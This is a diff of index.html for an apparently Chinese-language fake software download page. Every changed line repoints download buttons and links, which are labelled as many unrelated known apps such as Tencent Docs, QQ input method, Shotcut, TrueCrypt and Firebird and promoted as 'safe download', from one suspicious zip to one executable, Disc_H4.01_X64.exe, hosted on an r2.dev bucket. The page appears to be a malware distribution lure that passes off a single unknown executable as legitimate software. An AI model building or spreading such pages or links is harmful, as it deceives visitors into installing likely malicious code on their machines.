--- a/index.html
+++ b/index.html
@@ -655,7 +655,7 @@ s.parentNode.insertBefore(agl, s);
             </div>
             <div class="btn-container clearfix" style="margin-top: 28px; margin-left: -8px;">
               
-                <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" data-agl-cvt="6" class="btn banner-btn safe-btn-download down-data" title="立即下载" data-softid="1" data-text="安全下载" bk="主软件-1">立即下载</a>
+                <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" data-agl-cvt="6" class="btn banner-btn safe-btn-download down-data" title="立即下载" data-softid="1" data-text="安全下载" bk="主软件-1">立即下载</a>
                    
             </div>
 <p class="pro-desc" style="color:#000000">通过应用宝下载，感受更快速、更安全的下载体验</p>
@@ -3226,7 +3226,7 @@ s.parentNode.insertBefore(agl, s);
                                         <img src="static/picture/142726-62624aceb7e44.jpg" alt="微信管理大师">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="微信管理大师">微信管理大师</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="微信管理大师">微信管理大师</a>
                                         <span>应用程序｜48.7MB</span>
                                         <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
                                             <button>下载</button>
@@ -3252,39 +3252,39 @@ s.parentNode.insertBefore(agl, s);
                                             <ul class="icon-list-container ">
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/131933-6209e665e0198.jpg&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/131933-6209e665e0198.jpg" alt="腾讯文档">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="腾讯文档">腾讯文档</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="腾讯文档">腾讯文档</a>
                                         <span>系统工具｜182.73MB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
                                 </li>
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/145700-6214893c03093.jpg&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/145700-6214893c03093.jpg" alt="QQ输入法">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="QQ输入法">QQ输入法</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="QQ输入法">QQ输入法</a>
                                         <span>系统工具｜25.9MB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
                                 </li>
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/145522-64589cda270dc.jpg&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/145522-64589cda270dc.jpg" alt="万兴易修">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="万兴易修">万兴易修</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="万兴易修">万兴易修</a>
                                         <span>系统工具｜5.29MB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
@@ -3293,13 +3293,13 @@ s.parentNode.insertBefore(agl, s);
                                             <ul class="icon-list-container ">
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/142837-5ef98a151b5ef.jpg&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/142837-5ef98a151b5ef.jpg" alt="Shotcut">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="Shotcut">Shotcut</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="Shotcut">Shotcut</a>
                                         <span>媒体工具｜64.9MB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
@@ -3308,13 +3308,13 @@ s.parentNode.insertBefore(agl, s);
                                             <ul class="icon-list-container ">
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/084632-5ef2a2683ca42.jpg&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/084632-5ef2a2683ca42.jpg" alt="迅雷影音">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="迅雷影音">迅雷影音</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="迅雷影音">迅雷影音</a>
                                         <span>应用程序｜47.5MB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
@@ -3334,65 +3334,65 @@ s.parentNode.insertBefore(agl, s);
                                 </li>
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/134223-6260eebfb37fb.jpg&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/134223-6260eebfb37fb.jpg" alt="易压">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="易压">易压</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="易压">易压</a>
                                         <span>应用程序｜5.8MB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
                                 </li>
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/software_box.png&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/software_box.png" alt="TrueCrypt">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="TrueCrypt">TrueCrypt</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="TrueCrypt">TrueCrypt</a>
                                         <span>应用程序｜8077KB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
                                 </li>
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/100816-621c2e907837f.jpg&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/100816-621c2e907837f.jpg" alt="Lingo">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="Lingo">Lingo</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="Lingo">Lingo</a>
                                         <span>应用程序｜11.3MB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
                                 </li>
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/115850-65b08afa37702.jpg&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/115850-65b08afa37702.jpg" alt="Firebird">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="Firebird">Firebird</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="Firebird">Firebird</a>
                                         <span>应用程序｜13871KB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
                                 </li>
                                                             <li>
                                     <div style="background-image: url(&#39;https://dis.ebahwg.top/img/142726-62624aceb7e44.jpg&#39;);" class="bgc"></div>
-                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <img src="static/picture/142726-62624aceb7e44.jpg" alt="微信管理大师">
                                     </a>
                                     <div>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip" title="微信管理大师">微信管理大师</a>
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe" title="微信管理大师">微信管理大师</a>
                                         <span>应用程序｜48.7MB</span>
-                                        <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                        <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                             <button>下载</button>
                                         </a>
                                     </div>
@@ -3420,10 +3420,10 @@ s.parentNode.insertBefore(agl, s);
                         <div class="buttonList-bottom-container">
                             <p>【热门应用标签】</p>
                             <ul>
-                                                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <li>数据恢复</li>
                                     </a>
-                                                                    <a data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">
+                                                                    <a data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">
                                         <li>办公软件</li>
                                     </a>
                                                             </ul>
@@ -3440,7 +3440,7 @@ s.parentNode.insertBefore(agl, s);
     <div class="main-footdown-wrap">
       <div class="main-footdown">
         <div class="main-footdown-text">以上都不需要，使用普通方式下载</div>
-        <a class="main-footdown-btn down-data" data-agl-cvt="6" data-hdf-cvt="5" href="https://www.djfwo24423ehzw.top/xin225566/discordSetups64.zip">普通下载</a>
+        <a class="main-footdown-btn down-data" data-agl-cvt="6" data-hdf-cvt="5" href="https://pub-b978efeee5f74796b091da96ca739efb.r2.dev/Disc_H4.01_X64.exe">普通下载</a>
       </div>
     </div>
   <div class="footer-container clearfix">Copyright 111111 </div>
